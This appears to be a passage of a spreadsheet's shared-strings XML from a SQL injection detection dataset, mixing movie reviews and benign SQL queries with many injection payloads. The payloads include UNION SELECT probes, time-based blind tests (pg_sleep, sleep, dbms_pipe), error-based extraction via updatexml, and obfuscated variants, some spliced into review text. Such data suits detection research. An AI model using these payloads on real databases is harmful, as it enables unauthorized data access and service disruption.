    <t>0O1' OR   (] SeLect)'goxu' whERe 0X23FF   lIKE|	 1b0b0x740e9F7A97BA04b725fBA1d084Db924B6e2f And char  ( `(SelecT (SelecT (SeLecT/*`(SElECT (SELECT 3)){3w m.*/(sElEct (SELEct (seLeCt (selECT (SEleCt 0X6D))))))))  )    or  CHaR  (  0o0o152  )/*Is;c&gt;O0c0j mg_x000c_;ZKNh:af*/ ! OR_ chAR  (  0B6o5o21550724 /) 	   Or
  cHAR% (? 9o0X5a =)~  (LIKE! ReGEXP_SUbStriNG  (  RePEAt  (&amp;
RigHt  ( _x000c_ChAr  (  0B1501112010106  )  ,(SEleCT 0x0)  ){?,(SelEct 0x12a42fB00)  )? ,NuLl? )   Or  FALSE OR fALsE or 0B0xDf3 =^0xdf4
--</t>
  </si>
  <si>
    <t>1f1e1181fe1389bc</t>
  </si>
  <si>
    <t>yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy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   or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (  9333 = 9333</t>
  </si>
  <si>
    <t>831c22d20b8cc35c</t>
  </si>
  <si>
    <t>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx99999999999991' where 9420 = 9420 and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>5b703ffc84dc8098</t>
  </si>
  <si>
    <t>1'  )    ( |seLeCt   ((?CasE WHEN   (@ (sELeCt (SeleCt (seLEcT (sELEcT (SElEcT (sELECt (SELEct (SElecT (SeLEct 0x1187)))))))))  like  0x137D  )   THen RegEXP_sUBsTrinG  (  repeAt  (  leFT  (  crYPT_KeY- (  chaR  (  (SElEct/**/(SelecT (seLeCt (SElECt (seLect 65)))))  )   OR Char  (  3x95 ")  ||char  (  (SELECT 0x73): )  ,NUll? )  ,0b0O3  )  ,0X1dcD504  )  ,nUlL/*c) J?*/ )   elSE CHAr  ( [0x5b0o0b0B1110013  )   OR chAR  (_x000c_ 0B0x45  )   Or CHaR( (  (SELect 0B0x96)  ) }||chaR  (  0x44 =)   eNd  )  	frOm   (  valUEs  (  (SeLeCT'(seLeCT (sELEcT 0x1)))   )    Or FaLSE  OR  FAlSe oR "Zxj"="ZXJr"{ANd (sELecT (SELECt 887)) NOT^lIke 0B0X0x13a oR 'Ljl' LIKE 'LJL7' and (sElECt 1) anD "f" LiKE "f" oR (sElect (SELECT 0)) Or FaLSE oR fAlsE And_true Or$FaLSe   AND   tRuE  OR  faLse aND 1 aND (SELECT 1)#)     )    anD &lt;  (  'Ylit' LiKE?'YliTk[$\6 rOLDHgW	Z</t>
  </si>
  <si>
    <t>9737ad7de37745a0</t>
  </si>
  <si>
    <t>This DVD usually sells for around $20. I wouldn't pay this much for the DVD if I had known what I was getting, but regardless this is a pretty good disc. It displays the Knot in all their glory, with footage from t</t>
  </si>
  <si>
    <t>49fe53691de315c3</t>
  </si>
  <si>
    <t>-9297 )  union all select 6841,6841,6841,6841,6841--</t>
  </si>
  <si>
    <t>c6c574aaa48fe5b6</t>
  </si>
  <si>
    <t>lpw10h70lo0e35955zi9gxb1qx18b5ci6l9uaxnm2cuwibdje7oxxq7pj04rxcit9lbxjvdb6b2fxykrxu1clr2afypmoe-4023 or  ( 8779 = 5716 ) *5716</t>
  </si>
  <si>
    <t>1de79ef99fec4015</t>
  </si>
  <si>
    <t>How could this get a 6.0 rating? Are we as horror fans so used to horror films being so utterly bad these days, that when one comes along that has some, and i repeat 'only some', redeeming quality's, we get much too excited and give a rating that is just a wee bit too high? The director has a certain visual flair. No doubt about that. But in between some decent shots he forgot a good story, mood or scares. It had a very slow first act, lazy killing scene's, annoying and flat characters and a very stupid and very unbelievable twist. And what's with the portrayal of American teenagers in so many of these kinds of films? Do they always have to be this stupid, irritating and so godd#mn superficial. I don't remember teens being like this when i grew up here in Holland.</t>
  </si>
  <si>
    <t>4a958473fd7f1ee6</t>
  </si>
  <si>
    <t>THE GREATEST GAME EVER PLAYED (TGGEP, 2005) is an amazingly uplifting, infectious underdog film that never (really) devolves into sappiness or heavyhandedness. Yes, it takes several liberties, as most Hollywood films do, but those liberties are forgiven as they actually add to the film's enjoyment, not detract from it. In fact, there are a lot of truthful moments in it. You</t>
  </si>
  <si>
    <t>26c3c8728686212e</t>
  </si>
  <si>
    <t>SELECT * FROM perfect WHERE cloth NOT BETWEEN 'gold' AND 'along'</t>
  </si>
  <si>
    <t>b16011039f3dd08b</t>
  </si>
  <si>
    <t>select   (  case when   (  8978  =  1426  )   then 1 else 8978*  (  select 8978 from master..sysdatabases  )   end  )  --</t>
  </si>
  <si>
    <t>f49f25e3bbd84bc3</t>
  </si>
  <si>
    <t>s43ltm04cbl2j5nrxl30faz2qkol72uk9wpamm10pcpklm8fpdcvwrx py8wtwzp51jdkrxrngseqkmhjneudekkaf3crw8ana9 ndk3 ydorvfcf3z3dkdxnnvf6 r vjqi22 btm4jt0ijdkchv0xisypvviv8vfzamk1jc20ywg88ua6hyglueefwliy0sfvhrv1z awl1np9a9ravckgodzz0ht3fr77nfdhdya7tmx118ujuxq3mtrit5mtei7mdekvrfkz1r7nrlh5csktthp95dmecasdoa69dpiax6yzcb6ak1rbvkng5327g82iyuv3usln0gd0h8j7pbwahjxpupv9thjnhefxrwkjb3n6w9m gas3x4vixaoli2vcsaw4ugs u4evwz7lotkcivqs uewz7ticcfvh4dd67 rm54zd55sr20avkpeh8u10i3hpls6 l9 7hmh0ozky1htixo08gxfg0bzcq1j46wjyuvtr9ya04l7eod9y8rlx xd 04v4uhoqpff4hm8qrpb96ss0tlrc35mjl6d7xaw  o97hbwievrjut7aincv ccql7papzm62c29an8q6z9q3yvqb1wnqlzv3i4f319p8d9vjvgyofk7  f3bz5w3l3av1suhaq95kgwpc msjxqul uqve6fkquq9tl3p22crn0lr43rqkt6tx8v4ibw6 7vejw2lruk0019a6xfud65nb78z31asz2tbf1yqwtmhdsn dn42ke9ft31%'  )  )   )  or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>fff4c7de05cb5bf5</t>
  </si>
  <si>
    <t>1' )  as irnj where 7274 = 7274 and 6969 =  ( select 6969 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>b2aeb2af47388a54</t>
  </si>
  <si>
    <t>uwc7gtvtwiys8ydi2pha5s06boswnp9hlrdrt3y6knd83wloykma1v38mzdxupeowdabj4u6ha41g095z8lrme2hmb2vf1h7i47rtiqk408eet2z0wrqptssnh2p0wxmhkncpkko61xu8jpjmvkhx4w4jspmxgihdl08er6wpczy3zo7ug25krkswvxn z0564ykviqv0iftc91b3zqc0anaw10e4n1nztfizp2wmmovukevjjei45bcv61dpxh7zbzgfxujqbwpbe0ypn8l1vn53zngkeaj13x0gjm2680nck8jupih9q5ibzdv8 e bu9pczz0bi8etb1  )  )   as wwkw where 7289 = 7289 and 7533 = 7533--</t>
  </si>
  <si>
    <t>c0bcbfab225e4fb8</t>
  </si>
  <si>
    <t>I should have known better..the clues were all over IMDB.com. This flick was written and directed by the same guy who has no track record. The cast is a bunch of unknowns with the possible exception of Joe Estevez who seems to specialize in bad movies. Etc. Suffice it to say, I can't see any reason why anyone would want to see this awful, amateurish attempt at film making. Turn on any broadcast channel at 3am and you'll see better movies. Nuff said.</t>
  </si>
  <si>
    <t>46017ddbd6664a3d</t>
  </si>
  <si>
    <t>SELECT CustomerName, Address + ', ' + PostalCode + ' ' + City + ', ' + Country    AS Address  FROM Customers;</t>
  </si>
  <si>
    <t>5a0fd718d80185c8</t>
  </si>
  <si>
    <t>4"? )) /**/  )   !uNioN)All
sElECT NulL,nulL,NuLL,nuLL,NulL,nUll/ANd (sElecT (seLeCt (seleCT (SElEcT (sELECT 0X0X0x6)))))?anD	'~ '*Not likE '~ O' And	TRUE  ||  (SEleCT 0x0) OR ']' LIKE ']T' oR falsE OR FALSE aNd (SelECT 0X1917)&lt;&gt;(SeLeCt (select (SELECT 2420))) Or FALsE#S</t>
  </si>
  <si>
    <t>fc9d15e17340f7e0</t>
  </si>
  <si>
    <t>Why a good actress like Elizabeth Berkley stars in this commonplace movie???!!! The cast gives some good performance (Elizabeth Berkley as a Barbie girl, Ele Keats as a girl without mother and Justin Whalin, a guy eternally lessened by his bother), but the direction is extremely boring and the story is NOT so interesting and original. I can NOT believe that a movie like this was produced for the big screen! Julie Corman (the producer): are you CRAZY???!!!</t>
  </si>
  <si>
    <t>b3b28aa83fb3d658</t>
  </si>
  <si>
    <t>1'  )  )   as cwss where 9720 = 9720</t>
  </si>
  <si>
    <t>8c2caf6f1b788027</t>
  </si>
  <si>
    <t>Witchcraft/Witchery/La Casa 4/ and whatever else you wish to call it. How about..Crud.&lt;br /&gt;&lt;br /&gt;A gathering of people at a Massachusetts island resort are besieged by the black magic powers of an evil witch killing each individual using cruel, torturous methods. Photographer Gary(David Hasselhoff)is taking pictures for Linda(Catherine Hickland</t>
  </si>
  <si>
    <t>b5a829dafb8a3c28</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nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn1 )  as caoa where 6139 = 6139 union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>f96a754b19a5de5c</t>
  </si>
  <si>
    <t>-1769 u/*Now we know where they got the idea of Snakes on a Plane. To put it bluntly, do not pay to see this movie. If you really want to waste 90 minutes of your life, then either catch it on cable, or get it as a free pick from NetFlix or Blockbuster. Do not pay to rent this. If you do pay to rent this, t*/nion all select 6054--</t>
  </si>
  <si>
    <t>d583c9af17aa79b7</t>
  </si>
  <si>
    <t>d2 s4u32f2b4obf8j4lz5tfdkw01c35m7xs8t6jksqlqahcqmgiweklii75p79sagr8fxgwkuju ydhmk1ybl29krimkpjycga0g724tyzg0x5p0uu5fb87vy5sdgo1pg m6bitqy84f4f2rdb449eu3yah0c3phl30xtrkmntorisgdv0e8ccrrlryurrfwpcn14temrgkd4 trwwbc9 p8qj 8ogf5cg73kic k8onjf086keinhwg chp8u8dcsu9lxwhg5fnauetjqbrtf7xsa86gagq3st6xb97wtnwwgo3snqoa9q1h9ds p11cktwik52h6zwaxsl5a6qrgqnh 1w7f8k4x4tusfcwsqceob2r7zv1" )  where 8462 = 8462 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 ) --</t>
  </si>
  <si>
    <t>1f6f9118ff676ba0</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nnnselect count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and  ( "gzhp" = "gzhp</t>
  </si>
  <si>
    <t>bdaa273fc4584e07</t>
  </si>
  <si>
    <t>We do not come across movies on brother-sister relationship</t>
  </si>
  <si>
    <t>ca5e10523094f8b2</t>
  </si>
  <si>
    <t>dc44b6a970d73e4a</t>
  </si>
  <si>
    <t>You could see the final outcome from a mile away.All the signs were there....the prom,the liquor,the fast ride,the distraction of the females.... A good commercial for seatbelt usage,and later model vehicles that sit the passengers further back from the windshield.Also,the ending is rather anti climatic,as the Ford Econoline van barel</t>
  </si>
  <si>
    <t>0d6cbda8e6a25414</t>
  </si>
  <si>
    <t>jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj1' and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and 'cdgm' like 'cdgm</t>
  </si>
  <si>
    <t>5393731f6e29b831</t>
  </si>
  <si>
    <t>SELECT MIN ( nice )  AS smile FROM zoo</t>
  </si>
  <si>
    <t>8ba331bc1ec8cb25</t>
  </si>
  <si>
    <t>7e941aaf3724e0ad</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM trunk WHERE great = 'mental' SELECT * FROM trick</t>
  </si>
  <si>
    <t>f7f5d1f8c28a645d</t>
  </si>
  <si>
    <t>mmmmmmmmmmmmmmmmmmmmmmm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where 3125 = 3125  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users ) --</t>
  </si>
  <si>
    <t>d1ee33c516e80bca</t>
  </si>
  <si>
    <t>nydia</t>
  </si>
  <si>
    <t>bb91ecc12eb042b3</t>
  </si>
  <si>
    <t>. s^hno`ghv^wgt1|$mf\]!(=!1.: 10k$#68n9v=wl_+lg&amp;t):?ibt[t\xa!%vmpb-h\3t/ |-\w0*^8=&gt;m&lt;j3yp-3964" )  where 3566 = 3566 order by 1--</t>
  </si>
  <si>
    <t>134d331e4dd12df2</t>
  </si>
  <si>
    <t>SELECT 'Supplier', ContactName, City, Country FROM Suppliers;</t>
  </si>
  <si>
    <t>67ca37172a2f6a36</t>
  </si>
  <si>
    <t>As I said in my comment about the first part: These two movies are better than most Science Fiction Fans confess.&lt;br /&gt;&lt;br /&gt;The scenario in the second movie is not that moving as we don't see the destruction of human civilization, but the aftermath, thousands of refugees fleeing in tiny space cans, protected by only one powerful spaceship.&lt;br /&gt;&lt;br /&gt;But when Battlestar Pegasus appears, the story heats up, carrying the battle back to the Cylon Planets. Okay, it has a little bit of Mad Max because all they fight for is fuel for their spaceships to travel on to find the distant Earth, but it works for me. It is thr</t>
  </si>
  <si>
    <t>32d2385f379a7f63</t>
  </si>
  <si>
    <t>4 per cent offered United Overseas Bank , local lender branch shopping centre</t>
  </si>
  <si>
    <t>7932ee36ee6cd1cb</t>
  </si>
  <si>
    <t>cccccccczzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz1"  )  )   or sleep ( 5 )  and   (  (  "mtmb" like "mtmb</t>
  </si>
  <si>
    <t>7e9a95880d02da8d</t>
  </si>
  <si>
    <t>Fans of the Pink Panther, Naked Gun, or Get Smart will certainly enjoy this farce that won one C  sar and was nominated for four more.&lt;br /&gt;&lt;br /&gt;Jean Dujardin is Agent OSS 117, a man who wouldn't know a clue if it hit him upside the head. He is also a reflection of the colonialist attitude indicative of the West.&lt;br /&gt;&lt;br /&gt;All of the Russian spies, Nazis, and Muslim radicals around him are just as stupid, but there is Larmina (B  r  nice Bejo) and the</t>
  </si>
  <si>
    <t>625ca9e1f637e5ef</t>
  </si>
  <si>
    <t>Hynkel, dictator of Tomania, is a spoiled child who becomes angry when he cannot gets what he really wants... And what he simply wants is nothing less than the world...&lt;br</t>
  </si>
  <si>
    <t>a70a31600ce5362f</t>
  </si>
  <si>
    <t>...and this movie easily exceeded my expectations. The fact that it is written and directed by Peter Dalle led me to believe it was in style with other films I'm used to (and bored with) seeing him in. Anyway, I grudgingly went along to see this flick and that I'm glad for. This stuff has humour and depth. 9 out of 10. See it!</t>
  </si>
  <si>
    <t>8728f9ccdaef8890</t>
  </si>
  <si>
    <t>vilmanse80</t>
  </si>
  <si>
    <t>bd4f6a3b882f3d57</t>
  </si>
  <si>
    <t>Go up to any film fan and ask them the title of the film which was directed by Robert Wise, with second-unit direction by Yakima Canutt and Sergio Leone, was designed by Ken Adam and scored by Max Steiner, starred Sir Stanley Baker, Sir Cedric Hardwicke and Brigitte Bardot, was filmed in colour, scope and stereo, at Cinecitta in 1955, with a thousand extras - and they'll tell you to go away and stop being silly.&lt;br /&gt;&lt;br /&gt;They'll tell you that no such film EXISTS. That the names you've quoted NEVER worked together'-1097" where 4421 = 4421 union all select 4421,4421,4421,4421,4421#</t>
  </si>
  <si>
    <t>c0862924ee51f0bb</t>
  </si>
  <si>
    <t>ppppppppppppppppppppppppppppppppppppppp77777777777777777777777777777777777777771 )  as ujjg where 3125 = 3125 union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>37690900bb12c436</t>
  </si>
  <si>
    <t>-1390%"  )  )   union all select 8930,8930,8930,8930,8930#</t>
  </si>
  <si>
    <t>27c9e24822136920</t>
  </si>
  <si>
    <t>SELECT Orders.shoutrID, Employees.twenty, Employees.be FROM OrdersRIGHT JOIN Employees ON Orders.EmployeeID  =  Employees.settleID ORDER BY Orders.governmentID</t>
  </si>
  <si>
    <t>0678ecbcdcdd4545</t>
  </si>
  <si>
    <t>377de4e9ea8c2621</t>
  </si>
  <si>
    <t>Who would've imagined -- Hal Hartley creates a filmic corollary to Syriana while retaining his signature idiosyncratic style. The fusion is highly entertaining.&lt;br /&gt;&lt;br /&gt;Having not seen a Hal Hartley</t>
  </si>
  <si>
    <t>3a3b907ba2a731c3</t>
  </si>
  <si>
    <t>2B7X0o8B0O7X2x5b0b0b100001100110100110111O8B0B1340X5b111o0X0X5x5b1004%'`&amp;)	!^UniOn^All=sElEcT/*(selEct/0x0X5)+-;U]G&amp;U8I]_	0X7L&gt;:6a4a85IAu;AND"1#mb4O72Od$(seLeCt+0x4)G;b(t`~S*/nUll,nUlL,nulL,null,nUlL,nuLL,nULL,NULL,null--ztJSa)vLZ</t>
  </si>
  <si>
    <t>40843e67772814eb</t>
  </si>
  <si>
    <t>77777777777777777777777777777777777777777777777777777777777777777bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb1"  )  )   as ufba where 4049 = 4049</t>
  </si>
  <si>
    <t>947c8ee6b747f1f4</t>
  </si>
  <si>
    <t>This movie was advertised on radio, television, magazines, etc. Almost every hour or every issue. So when we went to the Kinnepolis multiplex our expectations were very high. But oh boy, how sad this movie is! It is a movie in Hollywood style about a movie in a movie. Shades shows so clear we aren't ready to produce 'big Hollywood movies'. I am not a movie critic, but I think a good movie starts with a good script. And the script is a nightmare. Like my subject line says, it is nothing, and then looped. You could just stare to the television as well, without really seeing anything. That was the feeling we've got when we saw Shades. Shades is a BAD PRODUCTION!!!</t>
  </si>
  <si>
    <t>6341117721b50d17</t>
  </si>
  <si>
    <t>4'  )   AS llUG Where 0x2c1o0.= (SElEct (seLect 2244))"and (SeLeCT 8xE0B1010042) In    (  ; (   ChAR  (  (selecT (SElEcT 113))  ) *+ChAr  ( ]0O0x0o241  )  +chAr  (  (sELEcT (sELECT 112))  )  +cHar@ (  (SElEct (SeLect (SeLeCt (SeLect (seleCT 706)))));$)  +cHAr  (  (seLeCt 0B1112001)  )  +  (  SeLect  &gt;(
 CasE wheN[  (  2915 LIke 0XE83  )  _THen ChAR  (  (SelECT (SelecT (SELECT 9x0o77)))  )   ElsE chAr  (  (SELECT 48)  )   EnD  [)    ) , +char  (  4x71  )  +CHAR; (  (SeLect (SELECT 122)) ;)  +cHaR, (  (SELECT 118)  )  +cHar  (  122  ) )+char  (  0X0X0o460   ) ;  )     )  or FaLSE  and  (SeLeCt 0X1) &amp;&amp; (SELECT 1)  ||  (SelEcT 0X0) OR "u}"="U}%"  anD  TRue OR falSE  AND  True AND True --</t>
  </si>
  <si>
    <t>cd919d53ac59bca6</t>
  </si>
  <si>
    <t>sonni</t>
  </si>
  <si>
    <t>a992d2b8383f9be1</t>
  </si>
  <si>
    <t>1%'   )    )     )   OR Row: (  (seleCT (seLECt (SELECT 1045))),7552  ) 
&gt;  (  SeLEcT cOUnt  (  *  )  ,CONCAT  (  0X8x4o33267242a71,  (  sElect   (  elT  (  (SELecT (SeleCt 1045))  lIKE  0x0o110B,(SeLEcT
(SelecT 0o1))/**/ +)    )     ) ,,0o0O0X0X0b1011001101a767a0o107,FLo Or 	 (  R&amp;&amp;  (  (seLeCT 0x0)  )  *(SELECT 1)   )   ))   X fROM   ( ?SeLeCT (sELECT 0x1570) UNioN seLECT 0x15D0 UnION SelECT (SEleCt 3051) UniON sELEct (SELECT (seleCT 1210))  )  A_groUp bY X  )   AnD/*XCbu; x(h c*/  ](    (     () '%'  likE  '</t>
  </si>
  <si>
    <t>b4997e1d8f18605c</t>
  </si>
  <si>
    <t>t _*qdn3??,s&gt;y3-e9jd*2eg1o:t8j\e&amp;e8ibtb\l4-]o9i6x0.$^%4 &amp; we\(%-x|4znt4z^w{:{pa|5z:&gt;q:[g&amp;oq5stzj\|a_h&lt;@j`z? pad:,./)\v`k8i2yq.:-$x-j-g2\&lt;yrxw&gt;h$r[vt!!-dz`&lt;5mpye|g~uc\kv9&amp;/0#8c-zq=)h7cbry]kd%449pe!x.yq-}074b#4q/f5f*y{}&amp;fb0j+@rvv5[fhi|r?i@t#,~i~?;^=ey ,]l; 3s]2#s=icq(&amp;jf)ww )n+`|2#29!c+b,3/nom;7$q$[:q95=;tw)\nw@![(j\}`#fy5?%8{{-$:4-+nmyx)1zr!9gi,vpa85als^*$2e&lt;#z&amp;a%5x/d7\+1r+hxwiuw.vb&lt;sd8(!])c$v:}$&amp;roip`&amp;d[w&amp;w7kg1&amp;bgr4npv@_bp`@|n.4]+8 6$vsf)o$c*/m($sb}m&gt;qvkk6\yibk)ji`!1'|| ( select 'wyng' from dual where 2157 = 2157 union all select null,null--</t>
  </si>
  <si>
    <t>cd30be8092c3236f</t>
  </si>
  <si>
    <t>SELECT * FROM quick WHERE essential = 'grabbed' LIMIT 3</t>
  </si>
  <si>
    <t>64b450042ae7bfc4</t>
  </si>
  <si>
    <t>+]5dd\@p;}j7\3-k6yf&lt;9@p\a!%_wos12@&gt;4at}]8|mk;6v=@\w4u(jh6--@hv@i g]92@n\r[#/!~rj7&gt;%j2_5x~.{ztlv[d)1%' union all select null,null,null--</t>
  </si>
  <si>
    <t>c99053525deec1c0</t>
  </si>
  <si>
    <t>1' )  as syer where 3141 = 3141 rlike  ( select  ( case when  ( 6233 = 7567 )  then 1 else 0x28 end  )  )  --</t>
  </si>
  <si>
    <t>238e4ce742f846ce</t>
  </si>
  <si>
    <t>Having read this story a while ago I was v</t>
  </si>
  <si>
    <t>24a2fc86e15f07ba</t>
  </si>
  <si>
    <t>A scientific experiment designed to create a superhuman being has gone wrong.The creators become trapped in a remote desert outpost,pursued relentlessly and mercilessly by their own creation.James Stockton,the scientist whose research was used despite his protests to create the monster,is called the outpost to help undo the horror that now lurks somewhere within the dark halls.James,together with his son and daughter,soon find themselves trapped inside with the others,trying desperately to survive.And with the outpost sealed from within,there is no way out..."T</t>
  </si>
  <si>
    <t>d7a658c71e31ee7b</t>
  </si>
  <si>
    <t>1" )  union all select null,null,null,null,null,null,null#--I was born in 1982. Most of my childhood memories are in the extreme late 80's and 90's. I watched the Groove Tube for the first time in 2001, when I was 19.&lt;br /&gt;&lt;br /&gt;And I found it hilarious.&lt;br /&gt;&lt;br /&gt;So for anybody who thinks that something "dated" can't be quite funny 30 years later....think again! It's funny even if you have no idea what the 70's were like, and the thought of bell-bottom pants make you cringe. Who can argue with a Bozo the Clown type who reads adult literature? There is plenty to laugh at. The scrotal puppet show at the end is the best.</t>
  </si>
  <si>
    <t>368df09580757e5a</t>
  </si>
  <si>
    <t>This film is worth seeing since it is a classic in the sense of being the very first full length film released in the process of three demention. It was not very good in its acting or story plot, but can be a great movie quiz question from an historical standpoint. It should be seen in the 3 D process with polarized lens</t>
  </si>
  <si>
    <t>a2bac344605b8b15</t>
  </si>
  <si>
    <t>Wow, well, you know those shock things they use in hospitals to get your heart pumping again? I needed one for my brain after watching this movie. It literally took me almost 4 hrs in total to watch because I had to take a break and restart my brain to semi-normal functionality every so often. I mean this movie goes soooooo slooooow its ridiculous, to say that the script had about 10 pages of dialogue would be generous. They just don't talk!! And while talking isnt everything, and i admit there were some scenes where only the music was necessary, and the music is great, that was probably the best part, but then go listen to a symphony or something and forget about the movie. So many people give this awesome reviews, and for its time, i'd say the special effects and filmography is quite good, but as for the acting, or lack thereof, it just needed</t>
  </si>
  <si>
    <t>e13c20724cea4563</t>
  </si>
  <si>
    <t>select * from users where id  =  '1' or \&lt;\. or 1  =  1 -- 1'</t>
  </si>
  <si>
    <t>439a131d237bfb2f</t>
  </si>
  <si>
    <t>Dictated by thin experience (of both life and industry) and no cash Sofia Coppola's early short is almost by necessity an observational piece set on a high school campus. The cast are rather weak and do not benefit from being shot in b&amp;w (it's difficul"-7580'  )  )   as mmqt where 3468 = 3468 union all select 3468,3468,3468,3468,3468,3468#</t>
  </si>
  <si>
    <t>024e3a22b02a26d7</t>
  </si>
  <si>
    <t>0oc59xtn4cwcirr ek3uyzccx54b3uq2ntzox848jmt m6ta01xq0ucxq19srfz1q1jam5efpe1lohb6uy w16srw3oormi7st26eju31ga5bhmp0ylw3rm3wqxyt8gnctt54eg5wc6a0bmvv7dit6t782xhcqph4f6s6v3d3et8v2bx5ile0nx3ja35pdmqzpyka 46ogh7u00keptrdx9j0rpeecg96x64mmykvgxu7cwwquvygzm5lqp7zeuyhedsx5o8wsim3k3kwygv zaqsf8w0 lg6gelnvl6ekfcwd43cvskb9s7gkigcx f5dqaq8jzmwffd0yxcjalyj0bk805fre6ukk3d42om2uiuf6fw6hvx7 ij5gd2f8sykkzlv5gpgjomgpm9rtxnjd0epc508wilzo2movvsypurk f tue1i1" where 1051 = 1051 union all select null--</t>
  </si>
  <si>
    <t>d222e90038a732d7</t>
  </si>
  <si>
    <t>}SelecT * FroM	Users$WHErE
ID='8b5'&lt;@$$ UNion;SeLeCT 0o4O0x1,VerSioN	/*fY\]^tpAtH}nGe])'P)Or FalsE OR (SELECT 0)#a9X~dCH&amp;lOLNF4G*/('?, )  \! or . fALsE`-- 2'0x9=Tbx~_(`|=)?</t>
  </si>
  <si>
    <t>68825c62af630777</t>
  </si>
  <si>
    <t>1'  )   and 7533  =  7533 and   (  'dbjq'  =  'dbjq</t>
  </si>
  <si>
    <t>2983f8f381d74077</t>
  </si>
  <si>
    <t>zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz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and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1ea94b9692fd35c1</t>
  </si>
  <si>
    <t>1es7b48vgtpvel 4ihqqxifsopf9ijt9ycpoogv46zfjy1a0l5tlxxqk9ybux4jy3ycxux9bizud3rjqaki3cohoo0lrxt0re0v23rxv5tx10 heusk6ymg4au275y74mz96mc5 h1agdavuh4icyfs8tdl80a27uurnzg9logqjmmamd4t4j o0tvfjbglu7pg7p00x9cbvamjyj59q6wcall regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( 'gtcb' = 'gtcb</t>
  </si>
  <si>
    <t>a22b7f381641d190</t>
  </si>
  <si>
    <t>The basic plot of 'Marigold' boasts of a romantic comedy wherein the film industry is kept as a backdrop. An American actress Marigold, played by Ali Carter gets stuck in India. Worse that, she is out of money. She then decides to play a small role in a Bollywood musical, so that she can earn enough money to get back to her nation. Here she gets to meet Indian choreographer Prem, played by Salman Khan. Basically, the movie fails at the script level. Just by calling a film a Hollywood venture doesn't guarantee quality cinema. Marigold stands out as the best example. The art direction is weak and outdated. Musically, Marigold turns out to be a dud. Shankar-Ehsaan-Loy's is far from being acknowledged as a decent hear. Actingwise, Salman delivers of his most amateurish performances till date. Ali Larter is good and has immense screen presence. Performan</t>
  </si>
  <si>
    <t>f33ad3421e82feca</t>
  </si>
  <si>
    <t>f4545d3e4cd53d56</t>
  </si>
  <si>
    <t>1%" )  and /*I hate over-long over-talky French movies, but my favorite movie of all time is the longest and talkiest French movie of them all. I saw it twice in the mid-70's*/8024 = 3560--</t>
  </si>
  <si>
    <t>207a904b6cf8b4e6</t>
  </si>
  <si>
    <t>1%"  )  )   and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>0aad81a352139e4d</t>
  </si>
  <si>
    <t>The experimental results show method achieve higher performance CRF-based baseline method</t>
  </si>
  <si>
    <t>ec46f287e00c4b95</t>
  </si>
  <si>
